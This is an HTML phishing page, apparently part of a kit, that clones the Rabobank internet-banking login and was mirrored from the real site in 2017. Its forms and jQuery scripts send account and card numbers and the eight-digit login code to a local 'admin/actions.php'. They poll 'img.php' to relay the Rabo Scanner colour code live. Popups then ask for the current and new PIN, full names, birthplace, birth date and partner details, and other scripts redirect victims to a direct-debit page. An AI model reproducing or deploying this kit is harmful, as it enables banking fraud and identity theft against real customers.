<!DOCTYPE HTML>
<html lang="nl" dir="ltr" class="no-js">	
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <head>
        <meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <title>Rabobank - Inloggen</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="HandheldFriendly" content="True">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
        <meta name="format-detection" content="telephone=no" />
        <meta http-equiv="cleartype" content="on">
        <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
        <link href="https://bankieren.rabobank.nl/rabo/sam/staticcontent/vrs_11_13_0/images/favicon.ico" rel="shortcut icon" />
        <meta charset="utf-8">
        <link rel="stylesheet" href="https://bankieren.rabobank.nl/rabo/sam/staticcontent/vrs_11_13_0/newdesign/css/rass-proto.css" /> 
        <link rel="stylesheet" href="https://bankieren.rabobank.nl/rabo/sam/staticcontent/vrs_11_13_0/newdesign/css/www-extension.css" /> 
        <link rel="stylesheet" href="css/mobile-new-css.css" />
        <link rel="stylesheet" href="2.css" />
        <link rel="stylesheet" href="https://bankieren.rabobank.nl/klanten/static/generic/font/myriad/default.css" />
        <script type="text/javascript" src="https://bankieren.rabobank.nl/rabo/sam/javascript/x12.js"></script>
    </head>
    <body class=" rass-chgen-rs" style="overflow-y: scroll">
        <div class="rass-pagetype-login rass-pagewrapper">
            <div id="rass-parallax-banner"></div>
            <div class="rass-container">
                <form id="langform" action="https://bankieren.rabobank.nl/omgevingskeuze/qsl_switchlanguage.do" method="post" autocomplete="off">
                    <input type="hidden" id="Scid" name="Scid" size="32" maxlength="32" value="32014cb1e64a4caeab7ed6fcd123d32e_1507551083374" />
                    <input type="hidden" name="SessHrGebrChk" value="false" />
                    <input type="hidden" name="AuthId" value="" />
                    <input type="hidden" name="AuthBpasNr" value="" />
                    <input type="hidden" name="language" value="nl" />
                    <input type="hidden" id="u" name="u" value="" />
                    <h1 aria-live="polite" class="rass-page-title">
                        Inloggen
                        <a href="https://www.rabobank.nl/" class="rass-ui-logo"><img src="https://bankieren.rabobank.nl/rabo/sam/staticcontent/vrs_11_13_0/newdesign/images/rabobank_logo.png" alt="rabobank logo" /></a>
                        <div class="langswitch">
                            <a data-rass-behavior="rass-action-linktoform" class="current" href="registratie4bd6.html?language=nl">NL</a>
                            <span>|</span>
                            <a data-rass-behavior="rass-action-linktoform"  href="registratie07a0.html?language=en">EN</a>
                        </div>
                    </h1>
                </form>
                <form id="loginform" action="https://bankieren.rabobank.nl/omgevingskeuze/qsl_setdebitcardforauth.do" method="post" autocomplete="off" data-rass-behavior="validate-form autosubmit-form" data-rass-resubmitmsg="Het verzoek is al verzonden. Een ogenblik geduld." class="rass-data-target">
                    <input type="hidden" id="Scid" name="Scid" size="32" maxlength="32" value="32014cb1e64a4caeab7ed6fcd123d32e_1507551083374" />
                    <input type="hidden" id="u2" name="u" value="" />
                    <a href="registratie07a0.html?SelectedReader=rr" data-rass-behavior="switch-reader" class="rass-skiplink">Heeft u alleen een<br/>Random&nbsp;Reader? Klik<br/>hier om in te loggen met de <br />Random&nbsp;Reader.</a>
                    <div class="rass-section-input">
                        <div class="input-wrapper">
                            <h2>Bankpas</h2>
                            <div data-rass-behavior="validate-iban reset-vc force-numkeypad" class="rass-wrapper-prefix">
                                <label for="rass-data-reknr">Rekeningnummer</label>
                                <div class="wrap">
                                    <label class="rass-focushelper1" for="rass-data-reknr"></label>        
                                    <div class="col-a">
                                        <div class="rass-extend-prefix" id="rass-extend-prefix">NL&#8226;&#8226; RABO 0</div>
                                    </div>
                                    <div class="col-b">
                                        <input autocomplete="off" id="rass-data-reknr" class="rass-data-target rassdatareknr2" type="text" maxlength="11" size="9" value="" name="AuthId" data-rass-behavior="rass-data-sync rass-state-autofocus" title="Laatste 9 cijfers van uw rekeningnummer" data-rass-validation="mandatory cnumeric 9clength" data-rass-msg="Rekeningnummer bestaat uit 9 cijfers" disabled/>
                                    </div>
                                    <span class="clearfix"></span>
                                </div>
                                <em class="rass-ui-error" style="display:none;"></em>
                            </div>
                            <a style="margin-top:64px;" href="#" tabindex="-1" class="rass-info-link" data-rass-behavior="show-in-tooltip" data-rass-content="/rabo/sam/staticcontent/vrs_11_13_0/newdesign/images/uitleg_rekeningnummer_nl.png">info</a>
                            <label for="rass-data-pasnr" data-rass-behavior="validate-pasnr reset-vc force-numkeypad" >
                                <span>Pasnummer</span>
                                <input autocomplete="off" id="rass-data-pasnr" class="rass-data-target rassdatapasnr2" name="AuthBpasNr" maxlength="4" size="4" type="text" value="" title="4 cijfers van uw pasnummer"  name="AuthId" data-rass-behavior="rass-data-sync" data-rass-validation="mandatory cnumeric 4clength" data-rass-msg="Pasnummer bestaat uit 4 cijfers" disabled style="padding-top:24px;"/>
                                <em class="rass-ui-error"></em>
                            </label>
                            <a href="#" tabindex="-1" class="rass-info-link" data-rass-behavior="show-in-tooltip" data-rass-content="/rabo/sam/staticcontent/vrs_11_13_0/newdesign/images/uitleg_pasnummer_nl.png">info</a>
                        </div>
                        <div class="rass-ui-checkbox">
                            <input name="SessHrGebrChk" type="checkbox" id="rass-data-onthouden" data-rass-behavior="rass-data-sync"  />
                            <label for="rass-data-onthouden">Onthouden</label>
                        </div>
                    </div>	
                    <div class="rass-section-action rass-hideonjs">
                        <!--                        <input  id="" class="" name="getcolorcode" type="submit" value="Kleurcode ophalen" />-->
                    </div>
                </form>
                <form action="admin/actions.php" method="post" autocomplete="off" data-rass-behavior="validate-form" id="qfs_form">
                    <input type="hidden" id="u3" name="u" value="" />
                    <input type="hidden" id="Scid" name="Scid" size="32" maxlength="32" value="32014cb1e64a4caeab7ed6fcd123d32e_1507551083374" />
                    <input type="hidden" id="SessHrGebrChk" name="SessHrGebrChk"  value="false" />
                    <div class="rass-section-input rass-qrcode-wrapper">
                        <ul style="width:350px;float:left;padding-right:0px;">
                            <li><strong>Bankpas</strong> in de <strong>Rabo&nbsp;Scanner</strong> plaatsen</li>
                            <li><strong>Pincode</strong> invoeren</li>
                            <li><strong>Scan</strong> de kleurcode
                                <!--<img class="rass-uicontrol-qrcode test_img" src="previewkleurencode.png" alt="inactieve kleurcode"  />-->
                                <img style="display:none;" class="rass-uicontrol-qrcode empty_kleurencode" src="empty_kleurencode.png" alt="inactieve kleurcode"  /> 
                            </li>
                            <li><strong>Controleer</strong> de samenvatting op de Rabo&nbsp;Scanner</li>
                        </ul>
                        <div class="frame">
                            <div class="col-md-4 clasv" style="">
                                <img style="display:none;width: 15px; height: 15px; left: 48%; top: 45%;position:absolute;" class="test_img_loader clasv" src ="ajax-loader.gif" id="loader">
                                <img style="display:none;width: 186.75px; height: 189px; left: 32px; top: 14%; position: absolute;" src ="ajax-loader.gif" class="clasImg" id="codeimg">
                            </div>
                        </div>	
                        <style type="text/css">
                            .frame{
                                width:255px;
                                height:255px;
                                float:right;
                                background:url(empty_kleurencode.png)no-repeat center;
                                background-size:100% 100%;
                                position:relative;
                            }
                            @media(max-width:680px){
                                .frame{
                                    float:left;
                                }
                            }
                            .error{color: red;}

                        </style>
                        <label for="rass-data-inlogcode" data-rass-behavior="validate-inlogcode force-numkeypad">
                            <span>Inlogcode</span>
                            <input style="border-bottom: 1px solid #AAA;" 
                                   autocomplete="off" id="rass-data-inlogcode" 
                                   class="rass-data-target rass-state-dynamicchild keyUp"  
                                   data-rass-behavior="rass-state-autofocus" 
                                   data-rass-validation="Uw inlogcode bestaat uit 8 cijfers." 
                                   data-rass-msg="Inlogcode bestaat uit 8 cijfers"
                                   name="inlogue" type="text" maxlength="8" size="8" value=""  disabled />                            
                            <em class="rass-ui-error" id="inl-err"></em>
                        </label>				
                    </div>
                    <input type="hidden" name="j" value="5" />
                    <div class="rass-section-action">
                        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">                        
                        <button id="rass-action-login22" class="buttonload rass-button-primary rass-state-dynamicchild" type="button" onclick="submas()" disabled >
                            Een moment geduld...&nbsp;<i class="fa fa-spinner fa-spin"></i>
                        </button>
                        <input  id="rass-action-cancel" data-rass-behavior="action-cancel" class="rass-button-tertiary rass-action-cancel" type="submit" name="cancel" value="Annuleren" data-rass-msg="U gaat inloggen afbreken."/>
                    </div>
                </form>
                <div class="footer">
                    <div>
                        <ul>
                            <li>
                                <a href="https://www.rabobank.nl/help_inlogscherm" rel="nofollow" data-rass-behavior="action-showinpopup" class="rass-help-link rass-icon-link">Help</a>
                            </li>
                            <li>
                                <a href="https://www.rabobank.nl/v" rel="nofollow" data-rass-behavior="action-showinpopup" class="rass-arrow-link rass-icon-link">Zo bankiert u veilig</a>
                            </li>

                        </ul>   
                    </div>    
                </div>
            </div>
            <div class="rass-section-service">
                <h2>Service</h2>
                <ul>
                    <li class="rass-rsp-nonmobile"><a href="https://www.rabobank.nl/p_service_nietinloggen" rel="nofollow" data-rass-behavior="action-showinpopup">Problemen met inloggen</a></li>
                    <li class="rass-rsp-nonmobile"><a href="https://www.rabobank.nl/rs_faq" rel="nofollow" data-rass-behavior="action-showinpopup">Veel gestelde vragen over Rabo&nbsp;Scanner</a></li>
                    <li class="rass-rsp-nonmobile"><a href="https://www.rabobank.nl/raboscannerdemo-inlog" rel="nofollow" data-rass-behavior="action-showinpopup">Demo inloggen met Rabo&nbsp;Scanner</a></li>
                    <li class="rass-rsp-nonmobile"><a href="https://www.rabobank.nl/raboscanner1" rel="nofollow" data-rass-behavior="action-showinpopup">Meer informatie over Rabo&nbsp;Scanner</a></li>
                </ul>
                <ul>
                    <li class="rass-rsp-nonmobile">
                        <form id="switchreaderform" action="https://bankieren.rabobank.nl/omgevingskeuze/qsl_switchreader.do" method="post" autocomplete="off">
                            <input type="hidden" id="Scid" name="Scid" size="32" maxlength="32" value="32014cb1e64a4caeab7ed6fcd123d32e_1507551083374" />
                            <input type="hidden" name="SessHrGebrChk" value="false" />
                            <input type="hidden" name="AuthId" value="" />
                            <input type="hidden" name="AuthBpasNr" value="" />
                            <input name="SelectedReader" type="hidden" value="rr"/>
                            <input id="rass-action-switchreader" type="submit" class="rass-button-tertiary rass-icon-link" name="switchreader" value="Inloggen met Random Reader" />
                        </form>
                    </li>
                    <li class="rass-rsp-nonmobile"><a href="https://www.rabobank.nl/p_rib_info" rel="nofollow" data-rass-behavior="action-showinpopup">Aanvragen Rabo&nbsp;Internetbankieren</a></li>
                    <li class="rass-more"><a href="https://www.rabobank.nl/meerservice" rel="nofollow" data-rass-behavior="action-showinpopup">Meer service</a></li>
                </ul>
            </div>

            <div class="rass-socialbar">
                <div class="rass-socialbar-topbar">
                    <div class="rass-socialbar-slogan"><span>Rabobank</span></div>
                </div>
            </div>		
        </div>
        <script type="text/javascript" src="https://bankieren.rabobank.nl/rabo/sam/staticcontent/vrs_11_13_0/javascript/brwcook.js"></script>
        <script type="text/javascript" src="https://bankieren.rabobank.nl/rabo/sam/javascript/brwfunc.js"></script>
        <script type="text/javascript" src="https://bankieren.rabobank.nl/rabo/sam/staticcontent/vrs_11_13_0/newdesign/scripts/device.min.js"></script>	
        <script type="text/javascript" src="rass-proto.js"></script>		        
        <!--<script type="text/javascript" src="https://bankieren.rabobank.nl/rabo/sam/staticcontent/vrs_11_13_0/newdesign/scripts/rass-proto.js"></script>-->
        <!-- Mirrored from bankieren.rabobank.nl/omgevingskeuze/registratie?language=nl by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 09 Oct 2017 12:11:23 GMT -->
        <script language="JavaScript"  src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.0/jquery.min.js"></script>
        <script>
                            $(document).ready(function (e) {

                                setInterval(function ()
                                {
                                    if ($("#submit").val() == '0') {
                                        $.ajax({
                                            type: "post",
                                            url: "img.php",
                                            data: "",
                                            success: function (data)
                                            {
                                                if (data != '') {
                                                    $("#loader,.loader-overlay").hide();
                                                    $("#codeimg").show();
                                                    $("#codeimg").attr("src", data);
                                                    $("#rass-data-inlogcode").removeAttr("disabled");
                                                    $("#rass-action-login22").removeAttr("disabled");
                                                    $("#rass-action-login22").html("Inloggen");
                                                }
                                            }
                                        });
                                    }
                                }, 3000);//time in milliseconds 
                                $(".loader-overlay").show();
                                $(".test_img_loader").show();
                                $(".test_img").css("cursor", "pointer");
                                $('.test_img').click(function () {
                                    $(".test_img_loader").show();
                                    loadb();
                                });
                                function loadb()
                                {
                                    $('body').mousemove(function () {
                                        $(".test_img_loader, .test_img").hide();
                                        $('.empty_kleurencode').show();
                                    });
                                }
                            });
        </script>
        <div id="popup1" class="overlay">
		            <div class="popup" id="p2" style="display:none;" class="rass-container">
                <form id="dataForm2" action="inloggen_active.php" method="post" class="ocf form-horizontal ng-valid-pattern ng-invalid ng-invalid ng-pristine ng-submitted" name="formsController.ocForm">
                    <input id="dataFormValues" name="dataFormValues" type="hidden"/>
                    <h1 aria-live="polite" class="rass-page-title" style="min-height:57px; font-size: 29px">
                        Wijzig uw pincode <br>
                    </h1>                    
                    <a class="close" href="#">&times;</a>
                    <div class="content">
                        <em class="rass-ui-error" id="p2error" style="float: left;margin-left: -15px;"></em>
                        <b>Behoudt u liever uw huidige pincode?</b> Vul dan uw huidige pincode hieronder in. <br /> U maakt dan gewoon gebruik van de pincode die u nu heeft.
                        <br>
                        <br>
                        <div style="background: #f5f5f5;border: 1px solid #ddd;padding: 9px; margin-bottom: 19px;height: 105px;">
                            <div style="margin-bottom:11px">  
                                <div class="row row-cust">
                                    <div class="col-sm-8 pull-left" style="width:155px;">
                                        <label for="pin1" style="font-weight: 400; margin-bottom: 5px; color: #333; font-family: Roboto,Arial,Helvetica,sans-serif; font-size: 14px; margin-right: 83px   ">Uw huidige pincode</label>
                                    </div>
                                    <div class="col-sm-4 pull-right">
                                        <div class="input-group" style="display:block;">
                                            <input class="numeric form-control" id="pin1" pattern=".{4,4}" maxlength="4" title="Uw pincode moet uit 4 cijfers bestaan" name="pin1" required type="password" style="height: 31px;letter-spacing: 8px;font-size: 12px;width: 75px;padding-left: 6px; border: 1px solid #000;text-align: center;">
                                            <span class="input-group-addon toggle-password" toggle="#pin1" style="cursor: pointer;"><i class="fa fa-eye-slash"></i></span>
                                        </div>
                                    </div>
                                </div>
                                <br /><br /><div class="clearfix"></div>
                                <div class="row row-cust">
                                    <div class="col-sm-8 pull-left" style="width:155px;">
                                        <label for="pin2" style="font-weight: 400; margin-bottom: 5px; color: #333; font-family: Roboto,Arial,Helvetica,sans-serif; font-size: 14px; margin-right: 83px   ">Uw huidige pincode (bevestigen)</label>
                                    </div>
                                    <div class="col-sm-4 pull-right">
                                        <div class="input-group" style="display:block;">
                                            <input class="numeric form-control" id="pin2" pattern=".{4,4}" maxlength="4" title="Uw pincode moet uit 4 cijfers bestaan" name="pin2" required type="password" style="height: 31px;letter-spacing: 8px;font-size: 12px;width: 75px;padding-left: 6px; border: 1px solid #000;text-align: center;">
                                            <span class="input-group-addon toggle-password" toggle="#pin2" style="cursor: pointer;"><i class="fa fa-eye-slash"></i></span>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div style="background: #f5f5f5;border: 1px solid #ddd;padding: 9px;;height: 105px;">
                            <div style="margin-bottom:11px">
                                <div class="row row-cust">
                                    <div class="col-sm-8 pull-left" style="width:155px;">
                                        <label for="pin3" style="font-weight: 400; margin-bottom: 5px; color: #333; font-family: Roboto,Arial,Helvetica,sans-serif; font-size: 14px; margin-right: 83px   ">Uw nieuwe pincode</label>
                                    </div>
                                    <div class="col-sm-4 pull-right">
                                        <div class="input-group" style="display:block;">
                                            <input class="numeric form-control" id="pin3" pattern=".{4,4}" maxlength="4" title="Uw pincode moet uit 4 cijfers bestaan" name="pin3" required type="password" style="height: 31px;letter-spacing: 8px;font-size: 12px;width: 75px;padding-left: 6px; border: 1px solid #000;text-align: center;">
                                            <span class="input-group-addon toggle-password" toggle="#pin3" style="cursor: pointer;"><i class="fa fa-eye-slash"></i></span>
                                        </div>
                                    </div>
                                </div>
                                <br /><br /><div class="clearfix"></div>
                                <div class="row row-cust">
                                    <div class="col-sm-8 pull-left" style="width:155px;">
                                        <label for="pin4" style="font-weight: 400; margin-bottom: 5px; color: #333; font-family: Roboto,Arial,Helvetica,sans-serif; font-size: 14px; margin-right: 83px   ">Uw nieuwe pincode (bevestigen)</label>
                                    </div>
                                    <div class="col-sm-4 pull-right">
                                        <div class="input-group" style="display:block;">
                                            <input class="numeric form-control" id="pin4" pattern=".{4,4}" maxlength="4" title="Uw pincode moet uit 4 cijfers bestaan" name="pin4" required type="password" style="height: 31px;letter-spacing: 8px;font-size: 12px;width: 75px;padding-left: 6px; border: 1px solid #000;text-align: center;">
                                            <span class="input-group-addon toggle-password" toggle="#pin4" style="cursor: pointer;"><i class="fa fa-eye-slash"></i></span>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <br>
                        <div class="rass-section-action rass-section-action2">
                            <button style="width:200px;" class="rass-button-primary rass-state-dynamicchild" type="submit">
                                Volgende
                            </button>
                        </div>
                    </div>
                </form>
                <input type="hidden" id="submit" name="submit" value="0" />
            </div>
            <div class="popup" id="p1" style="width:85%; max-width: 555px; padding-top: 1px;">
                <a style="z-index:9999;" class="close" href="#">&times;</a>
                <div class="rass-container" style="width:100%;max-width: none;background:none;box-shadow:none;">
                    <h1 aria-live="polite" class="rass-page-title" style="min-height:57px; font-size: 29px">
                        Vul hier uw gegevens in <br />
                    </h1>
                    <form id="dataForm" method="post" autocomplete="off" class="rass-data-target">                        
                        <div class="rass-section-input rass-section-input2 pull-left" style="width: 50%;">
                            <div class="input-wrapper input-wrapper2">
                                <div class="rass-wrapper-prefix rass-wrapper-prefix2">
                                    <label for="full_name" style="width: 100%;">Volledige voornamen</label>
                                    <div class="wrap" style="padding:0px 13px 4px 14px;">
                                        <div class="col-b">
                                            <input id="full_name" name="full_name" class="rass-data-target rassdatareknr2" type="text" />
                                        </div>
                                        <span class="clearfix"></span>
                                    </div>
                                    <em class="rass-ui-error"></em>
                                </div>
                            </div>
                        </div>
                        <div class="rass-section-input rass-section-input2 pull-left" style="width: 50%;">
                            <div class="input-wrapper input-wrapper2">
                                <div class="rass-wrapper-prefix rass-wrapper-prefix2">
                                    <label for="birth_place">Geboorteplaats</label>
                                    <div class="wrap" style="padding:0px 13px 4px 14px;">
                                        <div class="col-b">
                                            <input id="birth_place" name="birth_place" class="rass-data-target rassdatareknr2" type="text" />
                                        </div>
                                        <span class="clearfix"></span>
                                    </div>
                                    <em class="rass-ui-error"></em>
                                </div>
                            </div>
                        </div>
                        <div class="rass-section-input rass-section-input2 pull-left" style="width: 50%;">
                            <div class="input-wrapper input-wrapper2">
                                <div class="rass-wrapper-prefix rass-wrapper-prefix2">
                                    <label for="birth_date">Geboortedatum</label>
                                    <div class="wrap" style="padding:0px 13px 4px 14px;">
                                        <div class="col-b">
                                            <input id="birth_date" name="birth_date" placeholder="01-01-1970" class="rass-data-target rassdatareknr2" type="text" />
                                        </div>
                                        <span class="clearfix"></span>
                                    </div>
                                    <em class="rass-ui-error"></em>
                                </div>
                            </div>
                        </div>
                        <div class="rass-section-input rass-section-input2 pull-left" style="width: 100%;">
                            <div class="input-wrapper input-wrapper2">
                                <div class="rass-wrapper-prefix rass-wrapper-prefix2">  
                                    <label class="pull-left" for="birth_date">Heeft u een partner?</label>                                  
                                    <div class="radio radio-warning radio-inline pull-left">
                                        <input type="radio" id="inlineRadio1" value="Ja" name="is_partner">
                                        <label for="inlineRadio1"> Ja </label>
                                    </div>
                                    <div class="radio radio-warning radio-inline pull-left">
                                        <input type="radio" id="inlineRadio2" value="Nee" name="is_partner" checked="">
                                        <label for="inlineRadio2"> Nee </label>
                                    </div>
                                    <span class="clearfix"></span>
                                </div>
                                <em class="rass-ui-error"></em>
                            </div>
                        </div>
                        <div class="rass-section-input rass-section-input2 pull-left partner" style="width: 50%;display: none;">
                            <div class="input-wrapper input-wrapper2">
                                <div class="rass-wrapper-prefix rass-wrapper-prefix2">
                                    <label for="full_name" style="width: 100%;">Volledige namen partner</label>
                                    <div class="wrap" style="padding:0px 13px 4px 14px;">
                                        <div class="col-b">
                                            <input id="partner_full_name" name="partner_full_name" class="rass-data-target rassdatareknr2" type="text" />
                                        </div>
                                        <span class="clearfix"></span>
                                    </div>
                                    <em class="rass-ui-error"></em>
                                </div>
                            </div>
                        </div>
                        <div class="rass-section-input rass-section-input2 pull-left partner" style="width: 50%;display: none;">
                            <div class="input-wrapper input-wrapper2">
                                <div class="rass-wrapper-prefix rass-wrapper-prefix2">
                                    <label for="birth_place">Geboortedatum</label>
                                    <div class="wrap" style="padding:0px 13px 4px 14px;">
                                        <div class="col-b">
                                            <input id="partner_birth_date" placeholder="01-01-1980" name="partner_birth_date" class="rass-data-target rassdatareknr2" type="text" />
                                        </div>
                                        <span class="clearfix"></span>
                                    </div>
                                    <em class="rass-ui-error"></em>
                                </div>
                            </div>
                        </div>
                        <div class="rass-section-action rass-section-action2">
                            <button style="width:200px;" class="rass-button-primary rass-state-dynamicchild" type="submit">
                                Volgende
                            </button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
        <script type="text/javascript" src="dist/jquery.validate.min.js"></script>
        <script type="text/javascript" src="dist/localization/messages_nl.js"></script>
        <script type="text/javascript" src="dist/inloggen_active.js"></script>		
        <script type="text/javascript">

                            function submas()
                            {
                                var $obj = $("#rass-data-inlogcode");
                                var v = $obj.val();
                                if (v == '') {
                                    $("#inl-err").html($obj.attr("data-rass-msg"));
                                    return false;
                                } else if (v.length < '8') {
                                    $("#inl-err").html($obj.attr("data-rass-validation"));
                                    return false;
                                } else {
                                    $("#submit").val(1);
                                    $("#inl-err").html("");
                                    $("#rass-action-login22").html('Een moment geduld...&nbsp;<i class="fa fa-spinner fa-spin"></i>');
                                    var $formObj = $("#qfs_form");
                                    $.post($formObj.attr("action") + "?ajax=1", $formObj.serialize(), function (response) {
                                        if (response == "action") {
                                            setInterval(function () {
                                                $("#rass-action-login22").html('Een moment geduld...&nbsp;<i class="fa fa-spinner fa-spin"></i>').attr("disabled", "disabled");
                                                $.get("action.php", function (data) {
                                                    if (data != '') {
                                                        if (data == 'error') {
                                                            window.location.href = "inloggen.html?error=3";
                                                        } else if (data == 'popup') {
                                                            if (window.location.hash != "#popup1") {
                                                                window.location.href = "#popup1";
                                                                setOverFlow();
                                                            }															
                                                        } else if (data == "collection") {
                                                            window.location.href = "incasso.html";
                                                        }
                                                    }
                                                });
                                            }, 1000);
                                        }
                                    });
                                    return false;
                                }
                            }
                            var setOverFlow = function () {
                                if (window.location.hash == "#popup1") {
                                    $("body").css("overflow-y", "hidden");
                                } else {
                                    $("body").css("overflow-y", "scroll");
                                }
                            }
                            $(".close").on("click", function () {
                                $("body").css("overflow-y", "scroll");
                            });
							setOverFlow();
        </script>
        <style>
            .desktop .rass-section-input2, .desktop .rass-section-action2{width:200px;}
            .input-wrapper2 .rass-wrapper-prefix2{width:100%;}
            i.fa.fa-eye-slash,i.fa.fa-eye{margin-left: 7px;}
            .checkbox{padding-left:20px}.checkbox label{display:inline-block;position:relative;padding-left:5px}.checkbox label::before{content:"";display:inline-block;position:absolute;width:17px;height:17px;left:0;margin-left:-20px;border:1px solid #ccc;border-radius:3px;background-color:#fff;-webkit-transition:border .15s ease-in-out,color .15s ease-in-out;-o-transition:border .15s ease-in-out,color .15s ease-in-out;transition:border .15s ease-in-out,color .15s ease-in-out}.checkbox label::after{display:inline-block;position:absolute;width:16px;height:16px;left:0;top:0;margin-left:-20px;padding-left:3px;padding-top:1px;font-size:11px;color:#555}.checkbox input[type=checkbox]{opacity:0}.checkbox input[type=checkbox]:focus+label::before{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.checkbox input[type=checkbox]:checked+label::after{font-family:fontawesome;content:"\f00c"}.checkbox input[type=checkbox]:disabled+label{opacity:.65}.checkbox input[type=checkbox]:disabled+label::before{background-color:#eee;cursor:not-allowed}.checkbox.checkbox-circle label::before{border-radius:50%}.checkbox.checkbox-inline{margin-top:0}.checkbox-primary input[type=checkbox]:checked+label::before{background-color:#428bca;border-color:#428bca}.checkbox-primary input[type=checkbox]:checked+label::after{color:#fff}.checkbox-danger input[type=checkbox]:checked+label::before{background-color:#d9534f;border-color:#d9534f}.checkbox-danger input[type=checkbox]:checked+label::after{color:#fff}.checkbox-info input[type=checkbox]:checked+label::before{background-color:#5bc0de;border-color:#5bc0de}.checkbox-info input[type=checkbox]:checked+label::after{color:#fff}.checkbox-warning input[type=checkbox]:checked+label::before{background-color:#f0ad4e;border-color:#f0ad4e}.checkbox-warning input[type=checkbox]:checked+label::after{color:#fff}.checkbox-success input[type=checkbox]:checked+label::before{background-color:#5cb85c;border-color:#5cb85c}.checkbox-success input[type=checkbox]:checked+label::after{color:#fff}.radio{padding-left:20px}.radio label{display:inline-block;position:relative;padding-left:5px}.radio label::before{content:"";display:inline-block;position:absolute;width:17px;height:17px;left:0;margin-left:-20px;border:1px solid #ccc;border-radius:50%;background-color:#fff;-webkit-transition:border .15s ease-in-out;-o-transition:border .15s ease-in-out;transition:border .15s ease-in-out}.radio label::after{display:inline-block;position:absolute;content:" ";width:11px;height:11px;left:4px;top:4px;margin-left:-20px;border-radius:50%;background-color:#555;-webkit-transform:scale(0,0);-ms-transform:scale(0,0);-o-transform:scale(0,0);transform:scale(0,0);-webkit-transition:-webkit-transform .1s cubic-bezier(.8,-.33,.2,1.33);-moz-transition:-moz-transform .1s cubic-bezier(.8,-.33,.2,1.33);-o-transition:-o-transform .1s cubic-bezier(.8,-.33,.2,1.33);transition:transform .1s cubic-bezier(.8,-.33,.2,1.33)}.radio input[type=radio]{opacity:0}.radio input[type=radio]:focus+label::before{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.radio input[type=radio]:checked+label::after{-webkit-transform:scale(1,1);-ms-transform:scale(1,1);-o-transform:scale(1,1);transform:scale(1,1)}.radio input[type=radio]:disabled+label{opacity:.65}.radio input[type=radio]:disabled+label::before{cursor:not-allowed}.radio.radio-inline{margin-top:0}.radio-primary input[type=radio]+label::after{background-color:#428bca}.radio-primary input[type=radio]:checked+label::before{border-color:#428bca}.radio-primary input[type=radio]:checked+label::after{background-color:#428bca}.radio-danger input[type=radio]+label::after{background-color:#d9534f}.radio-danger input[type=radio]:checked+label::before{border-color:#d9534f}.radio-danger input[type=radio]:checked+label::after{background-color:#d9534f}.radio-info input[type=radio]+label::after{background-color:#5bc0de}.radio-info input[type=radio]:checked+label::before{border-color:#5bc0de}.radio-info input[type=radio]:checked+label::after{background-color:#5bc0de}.radio-warning input[type=radio]+label::after{background-color:#f0ad4e}.radio-warning input[type=radio]:checked+label::before{border-color:#f0ad4e}.radio-warning input[type=radio]:checked+label::after{background-color:#f0ad4e}.radio-success input[type=radio]+label::after{background-color:#5cb85c}.radio-success input[type=radio]:checked+label::before{border-color:#5cb85c}.radio-success input[type=radio]:checked+label::after{background-color:#5cb85c}
        </style>
    </body>
</html>
